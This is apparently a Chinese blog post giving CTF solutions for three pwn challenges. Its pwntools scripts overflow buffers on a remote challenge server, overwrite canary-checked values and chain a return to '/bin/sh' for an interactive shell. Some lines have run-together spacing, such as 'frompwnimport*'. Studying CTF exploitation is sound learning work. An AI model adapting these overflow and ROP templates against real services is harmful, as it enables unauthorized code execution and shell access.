MCTF pwn

作者: 天河_霜雪 | 来源:发表于2017-11-16 12:06 被阅读0次

pwn2

from pwn import *

#p=process("./pwn2")

p=remote("120.77.155.249",10010)

payload=22 *'a'

e=ELF("./pwn2")

addr=e.symbols["callme"]

payload+=p32(addr)

p.sendlineafter("[Y/N]",'Y')

p.sendlineafter("name:",payload)

p.interactive()

没做任何防护直接控制跳转

cannry

覆盖参数满足条件

frompwnimport*

#p=process("./canary")

p=remote("120.77.155.249",10011)

payload=10*'a'

payload+=p32(0x6b8b4567)

payload+=p32(0x123456)

payload+=p32(0x1A2B3C4D)

printlen(payload)

p.sendlineafter("[Y/N]",'Y')

p.sendlineafter("payload",payload)

p.recv(4096)

p.interactive()

rop

from pwn import *

context.log_level = "debug"

#p=process("./rop")

p=remote("120.77.155.249",12345)

payload=22 *'a'

e=ELF("./rop")

addr=e.symbols['callme']

print addr

payload+=p32(addr)

payload+=p32(addr)

payload+=p32(e.search("/bin/sh").next())

p.sendlineafter("[Y/N]",'Y')

p.sendlineafter("payload",payload)

p.interactive()

相关文章

网友评论

      本文标题:MCTF pwn

      本文链接:https://www.haomeiwen.com/subject/jyrlvxtx.html